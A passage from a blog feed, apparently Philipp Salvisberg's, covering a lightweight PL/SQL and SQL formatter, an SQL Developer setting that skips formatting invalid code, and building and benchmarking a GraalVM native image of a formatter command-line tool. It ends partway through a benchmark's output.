An advantage of a lightweight formatter is that you can implement it incrementally. It is similar to a linter with automatic correction capabilities. Ok, this is probably not that interesting from the user’s point of view.

Another advantage of a lightweight formatter is that you can support various code styles. For example you can accept select empno, ename from emp; on a single line. But you can also accept optional line breaks before the from_clause or between elements in the select_list. All variants are compliant with the mentioned code style.

Disadvantages of a Lightweight Formatter

Simply put a lightweight formatter is a compromise between conformity and individuality. You cannot call the formatter to ensure conformity regardless of the input.

There are a lot of undefined areas where no rule exist. And the developer has in fact the freedom to choose a fitting formatting style in such cases. In my opinion, that’s fine. And I hope that most developers will love it.

State of the Trivadis PL/SQL & SQL Formatter Settings

Originally the Trivadis PL/SQL & SQL Formatter Settings were based on the heavyweight formatter provided by the SQL Developer team. 90% of the Arbori code were their code. I added and changed some Arbori code to amend the formatter result to match my expectations better.

However, I was never really happy with this approach. Why? Because I had to compare the original Arbori code with every new SQL Developer and SQLcl version. Identifying changes was easy. But understanding the reason for a change was usually a challenge. Some changes were in conflict with “my” code base. As a result, maintenance became more and more cumbersome.

SQL Developer 20.4.1 and SQLcl 21.1.0 are the first version for which the lightweight formatter settings are available. At the same time we stopped to provide settings based on the heavyweight formatter. If you need a heavyweight formatter to enforce conformity of your code then you have to rely on the code base provided by the SQL Developer team.

The main branch requires the latest versions of SQL Developer and SQLcl. This is currently version 21.2.0 for both products. In my opinion the lightweight formatter produces reasonable code. It is much easier to identify which rule is responsible for a particular whitespace change due to the rule based implementation and a unified token-based logging strategy. There are test cases for each rule and a first set of test cases for major grammar elements. At the moment there are more than 470 tests cases for about 4000 lines of Arbori code. It’s not perfect, but I really think that the state for the formatting settings is much better than it ever was before.

If you find strange formatter results then please let us know by opening a GitHub issue. Thank you.

Really Lightweight?

In some areas the formatter behaves like a heavyweight formatter without tolerance for individuality.

One reason is that strangely formatted input code should produce reasonably formatted code. See these JUnit test cases for some examples.

Another reason is that we wanted to apply the calculated indentation for relevant parts of the parse tree. This really helps while writing code. Nobody wants to count spaces. Pressing Ctrl-F7 to format the code from time to time is much easier. The calculation of the indentation is the most elaborate and extensive code in the current Arbori code base. As a result, some individuality is lost.

Don’t worry, there is enough individuality left. The following examples show different formatting results using the same formatter settings (Trivadis defaults, “Line Breaks On subqueries” unchecked).

The reason for the different results are additional line breaks in the formatter input.


select e.empno, e.ename, e.job from emp e where e.deptno in (select d.deptno from dept d where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno, e.ename, e.job
  from emp e
 where e.deptno in (select d.deptno from dept d where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno, e.ename, e.job
  from emp e
 where e.deptno in (select d.deptno
                      from dept d
                     where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno, e.ename, e.job
  from emp e
 where e.deptno in (
          select d.deptno
            from dept d
           where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno,
       e.ename,
       e.job
  from emp e
 where e.deptno
       in
       (
          select d.deptno
            from dept d
           where d.loc
                 in
                 (
                    'DALLAS', 'CHICAGO'
                 )
       );

The “tokenized” result is based on an input where each token is placed in a separate line. It shows where line breaks are lost. For example, the second list entry 'CHICACO' cannot be on a separate line. Short expressions are kept on the same line. Short means less than 50% of the configured max. line width.

For create view, select, insert, update, delete, merge statements and PL/SQL code I consider the formatter a middleweight. For all other statements (e.g. create tablespace) it is really a lightweight.

The formatter is also capable of indenting single-line and multi-line comments. This is something that SQL Developer’s default formatter cannot do yet.

I hope you like the mix of conformity and individuality.

The post Lightweight Formatter for PL/SQL & SQL appeared first on Philipp Salvisberg's Blog.

Do Not Format Invalid Code in SQL Developer

$
0
0

Introduction

What happens when you call the formatter in SQL Developer for invalid code? Until recently SQL Developer tried to format it anyway. This produced strange results in some cases. Starting with SQL Developer version 21.2.0 there is a hidden option to suppress formatting when the code is invalid.

What Is Valid Code?

If the code can be compiled and executed, it is valid. Right? – Well, SQL Developer uses a parser written in Java. The resulting lexer token stream and the parse tree are essential inputs for the formatter. If the parser does not understand the code then it produces a partial parse tree. This means the parse tree is incomplete. In such cases the formatting result is unreliable. And it does not matter if the code can be compiled and executed.

Here’s an example of a valid SQL statement that produces a query result but still reports a syntax error.

There are three options in SQL Developer to spot a syntax error in an editor.

  1. A pinkish wavy line below the token (group) in the editor that is responsible for the syntax error. When you hoover over it a pop-up window with additional information appears.
  2. A pink area on the right border of the editor. When you hover over it a pop-up window with the code excerpt appears. When you click on it the cursor is positioned on the token with the pinkish wavy line (group).
  3. Syntax error; Partial parse tree: is shown as first line in the code outline window

According to the SQL Language Reference 21c this syntax is not allowed.

However, Oracle’s implementation allows to write the HAVING condition before the GROUP BY. That’s a fact.

As you can see, it is not so easy to write a complete parser based only on the documentation.

The Problem

When I call the formatter in SQL Developer with my favorite formatter settings for this code

select
   constraint_name
from
   user_cons_columns c
where
   c.table_name = 'EMP'
having
   count(1) = 1
group by
   constraint_name;

then I get the following result:

select constraint_name
  from user_cons_columns c
 where c.table_name = 'EMP'
having count(1) = 1
group by
   constraint_name;

When I fix the syntax error (from a SQL Developer’s parser perspective) in the original code like this:

select
   constraint_name
from
   user_cons_columns c
where
   c.table_name = 'EMP'
group by
   constraint_name
having
   count(1) = 1;

then the formatter result is:

select constraint_name
  from user_cons_columns c
 where c.table_name = 'EMP'
 group by constraint_name
having count(1) = 1;

In this example the difference is small. Just the group by clause which could not be formatted with the syntax error. However, in other cases the formatter result might be really weird. So in my opinion it is better to not format invalid code.

The Solution

Open the preferences in SQL Developer and export the Advanced Format settings as shown in this screenshot.

Then open the exported XML file in an editor and add the highlighted line:

<options><adjustCaseOnly>false</adjustCaseOnly>
<alignTabColAliases>true</alignTabColAliases>
<breakOnSubqueries>true</breakOnSubqueries>
<alignEquality>false</alignEquality>
<formatWhenSyntaxError>true</formatWhenSyntaxError>
<singleLineComments>oracle.dbtools.app.Format.InlineComments.CommentsUnchanged</singleLineComments>
<breakAnsiiJoin>false</breakAnsiiJoin>
<maxCharLineSize>128</maxCharLineSize>
<alignAssignments>false</alignAssignments>
<breaksProcArgs>false</breaksProcArgs>
<alignRight>false</alignRight>
<breaksComma>oracle.dbtools.app.Format.Breaks.After</breaksComma>
<breaksAroundLogicalConjunctions>oracle.dbtools.app.Format.Breaks.Before</breaksAroundLogicalConjunctions>
<alignNamedArgs>true</alignNamedArgs>
<formatProgramURL>default</formatProgramURL>
<formatThreshold>1</formatThreshold>
<spaceAroundOperators>true</spaceAroundOperators>
<useTab>false</useTab>
<idCase>oracle.dbtools.app.Format.Case.lower</idCase>
<extraLinesAfterSignificantStatements>oracle.dbtools.app.Format.BreaksX2.X2</extraLinesAfterSignificantStatements>
<breaksConcat>oracle.dbtools.app.Format.Breaks.Before</breaksConcat>
<spaceAroundBrackets>oracle.dbtools.app.Format.Space.Default</spaceAroundBrackets>
<flowControl>oracle.dbtools.app.Format.FlowControl.IndentedActions</flowControl>
<commasPerLine>5</commasPerLine>
<forceLinebreaksBeforeComment>false</forceLinebreaksBeforeComment>
<alignTypeDecl>true</alignTypeDecl>
<breakParenCondition>false</breakParenCondition>
<parseForwardAndBackward>true</parseForwardAndBackward>
<identSpaces>4</identSpaces>
<breaksAfterSelect>true</breaksAfterSelect>
<spaceAfterCommas>true</spaceAfterCommas>
<kwCase>oracle.dbtools.app.Format.Case.UPPER</kwCase>
<formatWhenSyntaxError>false</formatWhenSyntaxError>
</options>

Save the file and import it into the preferences of SQL Developer. It’s the same screen as before, but this time use the Import button.

Afterwards, SQL Developer will format valid code only.

The latest Trivadis PL/SQL & SQL Formatter Settings also use <formatWhenSyntaxError>false</formatWhenSyntaxError>.

Summary

Now you can decide whether you want to format code with syntax errors in SQL Developer. I recommend not to format invalid code. In most cases you will not be satisfied with the result anyway. And with larger files, you may not realize until much later that undo is no longer a simple keyboard shortcut.

Many thanks to the SQL Developer team and especially to Vadim Tropashko for implementing this enhancement request.

The post Do Not Format Invalid Code in SQL Developer appeared first on Philipp Salvisberg's Blog.

GraalVM Native Image – First Impressions

$
0
0

Introduction

A native image is an operating system specific executable file. You can build such an image for basically every application running on a Java virtual machine. This approach promises faster start-up times and lower resource consumptions. This makes it appealing for serverless computing, auto-scaling platforms and command line tools.

I gained some impressions of this GraalVM technology while developing a standalone command line tool for formatting PL/SQL and SQL code. In this blog post I share some personal experiences and thoughts.

Starting Point

My starting point is an executable JAR.  I can run it from the command line via java -jar tvdformat.jar. The main class com.trivadis.plsql.formatter.TvdFormat calls a JavaScript format.js and passes all command line parameters to the JavaScript. Behind the scenes Oracle’s parser and formatter which are part of SQLcl and SQL Developer do the heavy lifting.

It’s quite obvious that this Java application loads a lot of classes and resources dynamically. The GraalVM’s native image builder can identify such objects with the tracing agent. Using the agent is simple. You start the Java application with an additional parameter. The idea is to run the application long enough to detect all dynamically loaded classes and resources. Technically, the trace agent intercept the calls involved in that dynamic loading process. It’s a best effort approach. It cannot guarantee completeness.

The next command shows how I run the formatter with the tracing agent for a small PL/SQL project:

java -agentlib:native-image-agent=config-output-dir=config \
     -jar tvdformat.jar $HOME/github/plscope-utils \
     xml=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_advanced_format.xml \
     arbori=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_custom_format.arbori

This command formats 56 files and the trace agent produces 6 JSON configuration files in the config directory .

jni-config.json

Configuration file for parameter -H:JNIConfigurationFiles. See documentation.

predefined-classes-config.json

Configuration file for parameter -H:PredefinedClassesConfigurationFiles.

proxy-config.json

Configuration file for parameter -H:DynamicProxyConfigurationFiles. See documentation.

reflect-config.json

Configuration file for parameter --H:ReflectionConfigurationFiles. See documentation.

resource-config.json

Configuration file for parameter -H:ResourceConfigurationFiles. See documentation.

serialization-config.json

Configuration file for parameter -H:SerializationConfigurationFiles. “The serialization support ensures constructors for classes are contained in a native image, so that they can be deserialized in the first place”. See release notes of GraalVM 21.0.0.

Environment

The environment for this experiment was:

  • MacBook Pro (16-inch, 2021) with an Apple M1 Max chip and 64 GB memory running on macOS Monterey 12.0.1
  • GraalVM CE 21.3.0 (build 17.0.1+12-jvmci-21.3-b05)
  • Apache Maven 3.8.3
  • SQLcl: Release 21.4.0.0 Production Build: 21.4.0.348.1716, installed in /usr/local/bin/sqlcl
  • Standalone PL/SQL & SQL Formatter at commit b4d26bd installed in $HOME/trivadis/plsql-formatter-settings
    • tvdformat.jar produced via mvn -DskipTests=true package in the standalone/target subdirectory
    • zip -d tvdformat-21.4.1-SNAPSHOT.jar "META-INF/native-image/*" to remove the native-image configuration files (they would be automatically used otherwise)
  • plscope-utils at commit 0687f5c installed in $HOME/github/plscope-utils

You find the configuration files used in this blog post in this Gist.

Building Image With Tracing Agent’s Config Files

Let’s try to build a native image with these configuration files.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json \
-H:ReflectionConfigurationFiles=config/reflect-config.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

Here’s the console output:

[tvdformat:15574]    classlist:   3,420.59 ms,  0.96 GB
[tvdformat:15574]        (cap):   2,147.77 ms,  0.96 GB
[tvdformat:15574]        setup:   6,412.44 ms,  0.96 GB
[tvdformat:15574]     (clinit):   1,036.63 ms,  6.18 GB
[tvdformat:15574]   (typeflow):  16,832.01 ms,  6.18 GB
[tvdformat:15574]    (objects):  31,681.96 ms,  6.18 GB
[tvdformat:15574]   (features):  12,333.23 ms,  6.18 GB
[tvdformat:15574]     analysis:  63,801.37 ms,  6.18 GB
[tvdformat:15574]     universe:   3,216.66 ms,  6.18 GB
10971 method(s) included for runtime compilation
[tvdformat:15574]      (parse):  11,562.89 ms,  6.14 GB
[tvdformat:15574]     (inline):   6,112.92 ms,  7.19 GB
[tvdformat:15574]    (compile):  35,886.56 ms,  7.23 GB
[tvdformat:15574]      compile:  58,027.14 ms,  7.07 GB
[tvdformat:15574]        image:   5,407.78 ms,  7.07 GB
[tvdformat:15574]        write:   2,973.57 ms,  7.07 GB
[tvdformat:15574]      [total]: 147,632.30 ms,  7.07 GB
# Printing build artifacts to: /Users/phs/github/trivadis/plsql-formatter-settings/standalone/target/tvdformat.build_artifacts.txt

No error messages. Great. And what’s the size of the tvdformat executable? 115 megabytes. The main contributor is the --language:js parameter which includes probably a bit more than necessary.

Anyway, let’s run the native image.

./tvdformat $HOME/github/plscope-utils \
xml=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_advanced_format.xml \
arbori=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_custom_format.arbori

This call produces the following console output:

Exception in thread "main" javax.script.ScriptException: org.graalvm.polyglot.PolyglotException: TypeError: Access to host class java.lang.String is not allowed or does not exist.
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.toScriptException(GraalJSScriptEngine.java:483)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:460)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:400)
	at com.trivadis.plsql.formatter.TvdFormat.run(TvdFormat.java:34)
	at com.trivadis.plsql.formatter.TvdFormat.main(TvdFormat.java:67)
Caused by: org.graalvm.polyglot.PolyglotException: TypeError: Access to host class java.lang.String is not allowed or does not exist.
	at <js>.:program(<eval>:23)
	at org.graalvm.polyglot.Context.eval(Context.java:379)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:458)
	... 3 more

The String class is used on line 23 in format.js. We need to register Java classes used in JavaScript and extend the configuration accordingly.

Extending Reflection Configuration (1)

I reviewed the format.js  and the JavaScript callback functions in trivadis_custom_format.arbori and created an addition configuration file reflect-config2.json for all Java classes used in JavaScript.

reflect-config2.json


Now we can build the native image with this additional configuration file.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json \
-H:ReflectionConfigurationFiles=config/reflect-config.json,config/reflect-config2.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

The build completes without errors and produces a native image of 138 MB. 23 MB larger. Let’s run it.

The second run produces this console output:

Exception in thread "main" javax.script.ScriptException: org.graalvm.polyglot.PolyglotException: com.oracle.svm.core.jdk.UnsupportedFeatureError: Proxy class defined by interfaces [interface java.util.function.Predicate] not found. Generating proxy classes at runtime is not supported. Proxy classes need to be defined at image build time by specifying the list of interfaces that they implement. To define proxy classes use -H:DynamicProxyConfigurationFiles=<comma-separated-config-files> and -H:DynamicProxyConfigurationResources=<comma-separated-config-resources> options.
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.toScriptException(GraalJSScriptEngine.java:483)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:460)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:400)
	at com.trivadis.plsql.formatter.TvdFormat.run(TvdFormat.java:34)
	at com.trivadis.plsql.formatter.TvdFormat.main(TvdFormat.java:67)

An excellent error message. We need to configure the class java.util.function.Predicate via -H:DynamicProxyConfigurationFiles. Let’s do this.

Extending Dynamic Proxy Configuration

For this blog post I decided to create a second configuration file proxy-config2.json to distinguish it from the one generated by the trace agent.

Let’s build the native image with this additional configuration file.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json,config/proxy-config2.json \
-H:ReflectionConfigurationFiles=config/reflect-config.json,config/reflect-config2.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

The build completed without errors and produces a native image of 138 MB. The same size es before. Let’s run it.

The third run produces this console output:

Formatting file 1 of 56: /Users/phs/github/plscope-utils/README.md... done.
Formatting file 2 of 56: /Users/phs/github/plscope-utils/database/README.md... Exception in thread "main" javax.script.ScriptException: java.lang.Exception: java.lang.AssertionError: oracle.dbtools.arbori.ScriptException: java.lang.NumberFormatException: Cannot parse null string
	at oracle.dbtools.app.Format.format(Format.java:387)
	at <js>.formatMarkdownFile(<eval>:489)
	at <js>.formatFiles(<eval>:528)
	at <js>.run(<eval>:552)
	at <js>.:program(<eval>:617)
	at org.graalvm.polyglot.Context.eval(Context.java:379)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:458)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:400)
	at com.trivadis.plsql.formatter.TvdFormat.run(TvdFormat.java:34)
	at com.trivadis.plsql.formatter.TvdFormat.main(TvdFormat.java:67)
Caused by: java.lang.Exception: java.lang.AssertionError: oracle.dbtools.arbori.ScriptException: java.lang.NumberFormatException: Cannot parse null string
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.toScriptException(GraalJSScriptEngine.java:476)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:460)
	... 3 more

This is quite interesting. The embedded format.js works now. The first file README.md does not contain SQL text blocks. and therefore the formatter was not called and no error was reported. But the formatter failed for the second file. What could be the reason for NumberFormatException: Cannot parse null string? – In this case the ParseNode class could not be loaded dynamically. To load this class successfully a lot of other classes are also required.

Extending Reflection Configuration (2)

Identifying all the dynamically loaded classes is not that simple. To debug the native image you can enable or add logging output, review the related source code or use a debugger. The native image debugger is an enterprise feature that is on the road map for the community edition. However, you still need to identify the reason for every single runtime exception. After adding the class to the configuration file you need to rebuild the native image and run it to detect the next exception. Doing this manually is really time-consuming.

Another approach is to register classes and their constructors, methods and fields programmatically using configuration with features. I’ve done that for a few chosen packages of the dbtools-common.jar that is part of the SQLcl installation. See source on GitHub.

For this blog post I created an additional configuration file with 218 classes.

reflect-config3.json


Let’s once more build the native image with an additional configuration file.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json,config/proxy-config2.json \
-H:ReflectionConfigurationFiles=\
config/reflect-config.json,config/reflect-config2.json,config/reflect-config3.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

The build completed without errors and produces a native image of 145 MB. 7 MB larger than before. Let’s run it.

The fourth run produces this console output:

Formatting file 1 of 56: /Users/phs/github/plscope-utils/README.md... done.
Formatting file 2 of 56: /Users/phs/github/plscope-utils/database/README.md... done.
Formatting file 3 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/00_demo_readme.sql... done.
Formatting file 4 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/01_demo_plscope.sql... done.
Formatting file 5 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/02_demo_lineage.sql... done.
Formatting file 6 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/03_demo_utl_xml_parsequery.sql... done.
Formatting file 7 of 56: /Users/phs/github/plscope-utils/database/demo/package/etl.pkb... done.
Formatting file 8 of 56: /Users/phs/github/plscope-utils/database/demo/package/etl.pks... done.
Formatting file 9 of 56: /Users/phs/github/plscope-utils/database/demo/synonym/source_syn.sql... done.
Formatting file 10 of 56: /Users/phs/github/plscope-utils/database/demo/table/dept.sql... done.
Formatting file 11 of 56: /Users/phs/github/plscope-utils/database/demo/table/deptsal.sql... done.
Formatting file 12 of 56: /Users/phs/github/plscope-utils/database/demo/table/deptsal_err.sql... done.
Formatting file 13 of 56: /Users/phs/github/plscope-utils/database/demo/table/drop_demo_tables.sql... done.
Formatting file 14 of 56: /Users/phs/github/plscope-utils/database/demo/table/emp.sql... done.
Formatting file 15 of 56: /Users/phs/github/plscope-utils/database/demo/view/source_view.sql... done.
Formatting file 16 of 56: /Users/phs/github/plscope-utils/database/install.sql... done.
Formatting file 17 of 56: /Users/phs/github/plscope-utils/database/install_test.sql... done.
Formatting file 18 of 56: /Users/phs/github/plscope-utils/database/test/package/test_dd_util.pkb... done.
Formatting file 19 of 56: /Users/phs/github/plscope-utils/database/test/package/test_dd_util.pks... done.
Formatting file 20 of 56: /Users/phs/github/plscope-utils/database/test/package/test_etl.pkb... done.
Formatting file 21 of 56: /Users/phs/github/plscope-utils/database/test/package/test_etl.pks... done.
Formatting file 22 of 56: /Users/phs/github/plscope-utils/database/test/package/test_lineage_util.pkb... done.
Formatting file 23 of 56: /Users/phs/github/plscope-utils/database/test/package/test_lineage_util.pks... done.
Formatting file 24 of 56: /Users/phs/github/plscope-utils/database/test/package/test_parse_util.pkb... done.
Formatting file 25 of 56: /Users/phs/github/plscope-utils/database/test/package/test_parse_util.pks... done.
Formatting file 26 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_context.pkb... done.
Formatting file 27 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_context.pks... done.
Formatting file 28 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_identifiers.pkb... done.
Formatting file 29 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_identifiers.pks... done.
Formatting file 30 of 56: /Users/phs/github/plscope-utils/database/test/package/test_type_util.pkb... done.
Formatting file 31 of 56: /Users/phs/github/plscope-utils/database/test/package/test_type_util.pks... done.
Formatting file 32 of 56: /Users/phs/github/plscope-utils/database/utils/context/plscope.ctx... done.
Formatting file 33 of 56: /Users/phs/github/plscope-utils/database/utils/package/dd_util.pkb... done.
Formatting file 34 of 56: /Users/phs/github/plscope-utils/database/utils/package/dd_util.pks... done.
Formatting file 35 of 56: /Users/phs/github/plscope-utils/database/utils/package/lineage_util.pkb... done.
Formatting file 36 of 56: /Users/phs/github/plscope-utils/database/utils/package/lineage_util.pks... done.
Formatting file 37 of 56: /Users/phs/github/plscope-utils/database/utils/package/parse_util.pkb... done.
Formatting file 38 of 56: /Users/phs/github/plscope-utils/database/utils/package/parse_util.pks... done.
Formatting file 39 of 56: /Users/phs/github/plscope-utils/database/utils/package/plscope_context.pkb... done.
Formatting file 40 of 56: /Users/phs/github/plscope-utils/database/utils/package/plscope_context.pks... done.
Formatting file 41 of 56: /Users/phs/github/plscope-utils/database/utils/package/type_util.pkb... done.
Formatting file 42 of 56: /Users/phs/github/plscope-utils/database/utils/package/type_util.pks... done.
Formatting file 43 of 56: /Users/phs/github/plscope-utils/database/utils/type/col_lineage_type.sql... done.
Formatting file 44 of 56: /Users/phs/github/plscope-utils/database/utils/type/col_type.sql... done.
Formatting file 45 of 56: /Users/phs/github/plscope-utils/database/utils/type/obj_type.sql... done.
Formatting file 46 of 56: /Users/phs/github/plscope-utils/database/utils/type/t_col_lineage_type.sql... done.
Formatting file 47 of 56: /Users/phs/github/plscope-utils/database/utils/type/t_col_type.sql... done.
Formatting file 48 of 56: /Users/phs/github/plscope-utils/database/utils/type/t_obj_type.sql... done.
Formatting file 49 of 56: /Users/phs/github/plscope-utils/database/utils/user/plscope.sql... done.
Formatting file 50 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_col_usage.sql... done.
Formatting file 51 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_identifiers.sql... done.
Formatting file 52 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_ins_lineage.sql... done.
Formatting file 53 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_naming.sql... done.
Formatting file 54 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_statements.sql... done.
Formatting file 55 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_tab_usage.sql... done.
Formatting file 56 of 56: /Users/phs/github/plscope-utils/sqldev/README.md... done.

Finally, a working native image.

Testing

I have a total of 604 JUnit tests for the formatter. When all tests succeed I can expect that the executable JAR works as well.

Now we need additional tests to detect runtime errors that happen only when running a native image. This is necessary for missing configurations as shown above, but also for other cases where the native image behaves differently.

In my case I want to run three existing JUnit tests for the main method in TvdFormat. How do I do that? A good choice is to use the Maven plugin for GraalVM Native Image building (of course there is also a plugin for Gradle). This plugin produces a dedicated native image for tests. When you run this native image all configured tests are executed and the results are shown on the console. A non-zero exit status indicates a failure.

When you run mvn -Dnative.skip=false integration-test a native image named native-tests is created and executed during the build. You can run it also after the build via ./native-tests. It produces the following console output:

JUnit Platform on Native Image - report
----------------------------------------

com.trivadis.plsql.formatter.standalone.tests.TvdFormatTest > jsonArrayFileTest() SUCCESSFUL

com.trivadis.plsql.formatter.standalone.tests.TvdFormatTest > jsonArrayDirTest() SUCCESSFUL

com.trivadis.plsql.formatter.standalone.tests.TvdFormatTest > jsonObjectFileTest() SUCCESSFUL


Test run finished after 3198 ms
[         2 containers found      ]
[         0 containers skipped    ]
[         2 containers started    ]
[         0 containers aborted    ]
[         2 containers successful ]
[         0 containers failed     ]
[         3 tests found           ]
[         0 tests skipped         ]
[         3 tests started         ]
[         0 tests aborted         ]
[         3 tests successful      ]
[         0 tests failed          ]

You find these JUnit tests here and the Maven configuration here.

Maybe you wonder why I do not run all JUnit tests. Simply put, they do not work. Some of them intentionally, because they are testing the integration with SQLcl which is not applicable in the standalone image (the necessary libraries are not included by purpose). Other test cases require configuration changes or need to be rewritten for the use in native images. In other words, there is still work to be done.

Performance

What to Measure

Let’s compare the runtimes of the following execution variants:

  1. Native image with GraalVM CE 21.3.0 (build 17.0.1+12-jvmci-21.3-b05
  2. Executable JAR with GraalVM CE 21.3.0 (build 17.0.1+12-jvmci-21.3-b05)
  3. Executable JAR with JDK 17.0.1 for macOS ARM 64

The GraalVM JDK is not yet available for macOS ARM 64 (see GitHub issue). This means that we must use the Intel x64 variant, which requires Rosetta 2 to translate the Intel x64 instructions for the M1 Max chip. This emulation works quite well and is transparent for the user. However, it needs time. To get an idea of the performance improvement of the native image technology, option (1) and (2) should be compared. Option (3) is still interesting for comparison with option (2). It shows the impact of the Rosetta 2 chip emulation.

I’d like to measure the performance of these two scenarios:

  1. Startup time (start the executable without parameters to show the help)
  2. Formatting 56 files (of plscope-util project, that what we’ve run previously)

Scenario 1 – Startup Time

In this scenario we measure the startup time of the formatter. This means we call the formatter without parameters to show the help. The shell script shows what I measured.

Shell script - startup time

#!/bin/zsh

call() {
    echo "$1" "($2)"
    for ((i=0; i<3; i++))
    do
       eval "time $2 > /dev/null"
    done;
}

echo
echo Scenario 1 - Startup Time
echo -------------------------
unset JAVA_HOME
call "1) Native Image" "./tvdformat"
export JAVA_HOME=$HOME/Applications/graalvm-ce-java17-21.3.0/Contents/Home
call "2) GraalVM" "java -jar ./tvdformat.jar"
export JAVA_HOME=`/usr/libexec/java_home -v 17`
call "3) ARM JDK" "java -jar ./tvdformat.jar"

Scenario 1 - Startup Time
-------------------------
1) Native Image (./tvdformat)
  0.29s user 0.05s system 94% cpu 0.355 total
  0.29s user 0.04s system 96% cpu 0.336 total
  0.29s user 0.04s system 96% cpu 0.337 total
2) GraalVM (java -jar ./tvdformat.jar)
  2.99s user 0.43s system 143% cpu 2.387 total
  2.97s user 0.42s system 142% cpu 2.376 total
  2.99s user 0.43s system 142% cpu 2.392 total
3) ARM JDK (java -jar ./tvdformat.jar)
  0.65s user 0.04s system 167% cpu 0.414 total
  0.65s user 0.05s system 165% cpu 0.419 total
  0.64s user 0.04s system 159% cpu 0.427 total

I used the result of the second execution per variant to create the chart.

Scenario 2 - Startup Time - Native Image vs Executable JAR

The native image delivers by far the fasted startup times. It’s 7 times faster and uses 10 times less CPU resources. Rosetta 2 leads to an overhead of about factor 4.7 from a CPU usage perspective.

Scenario 2 – Formatting 56 files

In this scenario we measure the time to format 56 PL/SQL and SQL files of the plscope-util project. The shell script shows what I measured.

Shell script - formatting 56 files

#!/bin/zsh

call() {
    echo "$1" "($2)"
    for ((i=0; i<3; i++))
    do
       eval "time $2 $HOME/github/plscope-utils \
            xml=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_advanced_format.xml \
            arbori=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_custom_format.arbori \
            > /dev/null"
    done;
}

echo
echo Scenario 2 - Formatting 56 files
echo --------------------------------
unset JAVA_HOME
call "1) Native Image" "./tvdformat"
export JAVA_HOME=$HOME/Applications/graalvm-ce-java17-21.3.0/Contents/Home
call "2) GraalVM" "java -jar ./tvdformat.jar"
export JAVA_HOME=`/usr/libexec/java_home -v 17`
call "3) ARM JDK" "java -jar ./tvdformat.jar"

Scenario 2 - Formatting 56 files
--------------------------------
1) Native Image (./tvdformat)
